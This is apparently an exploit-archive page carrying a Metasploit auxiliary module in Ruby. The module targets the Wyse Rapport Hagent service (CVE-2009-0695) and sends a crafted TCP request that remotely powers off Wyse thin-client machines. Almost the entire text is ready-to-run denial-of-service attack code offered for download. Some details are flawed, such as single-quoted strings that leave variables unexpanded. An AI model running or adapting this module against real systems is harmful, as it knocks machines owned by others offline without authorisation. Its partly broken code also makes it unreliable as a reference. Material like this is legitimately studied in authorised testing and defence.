Wyse Machine Remote Power off (DOS) without any privilege



EKU-ID: 2306 CVE: 2009-0695 OSVDB-ID: 55839
Author: solunium Published: 2012-06-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


require 'msf/core'

class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos

def initialize(info = {})
super(update_info(info,
'Name'           => 'Wyse Machine Remote Power off (DOS)',
'Description'    => %q{
This module exploits the Wyse Rapport Hagent service and cause
                                        remote power cycle (Power off the wyse machine remotely).
},
'Stance'         => Msf::Exploit::Stance::Aggressive,
'Author'         => 'it.solunium@gmail.com',
'Version'        => '$Revision: 14976 $',
'References'     =>
[
['CVE', '2009-0695'],
['OSVDB', '55839'],
['US-CERT-VU', '654545'],
['URL', 'http://snosoft.blogspot.com/'],
['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
],
'Privileged'     => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Targets'        =>
[
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
],
'DefaultTarget'  => 0,
'DisclosureDate' => 'Jun 13 2012'
))

register_options(
[
Opt::RPORT(80),
], self.class)
end


def run


# Connect to the target service
print_status("Connecting to the target #{rhost}:#{rport}")
if connect
                print_status("Connected...")
                end

# Parameters

                genmac     = "00"+Rex::Text.rand_text(5).unpack("H*")[0]

craft_req = '&V52&CI=3|'
                craft_req << 'MAC=#{genmac}|#{rhost}|'
                craft_req << 'RB=0|MT=3|'
                craft_req << '|HS=#{rhost}|PO=#{rport}|'
                craft_req << 'SPO=0|'

                # Send the malicious request
sock.put(craft_req)

# Download some response data
resp = sock.get_once(-1, 10)
print_status("Received: #{resp}")

                disconnect

if not resp
print_error("No reply from the target, this may not be a vulnerable system")
return
end

if resp == '&00'
                print_status("#{rhost} execute command succefuly & power off.")
                return
                end

                #Exeptions
rescue ::Rex::ConnectionRefused
print_status("Couldn't connect to #{rhost}:#{rport} | Connection refused.")
                rescue ::Rex::HostUnreachable
print_status("Couldn't connect to #{rhost}:#{rport} | Host unreachable")
                rescue  ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport} | Connection time out")
rescue ::Errno::ECONNRESET, ::Timeout::Error
print_status("#{rhost} not responding.")

end
end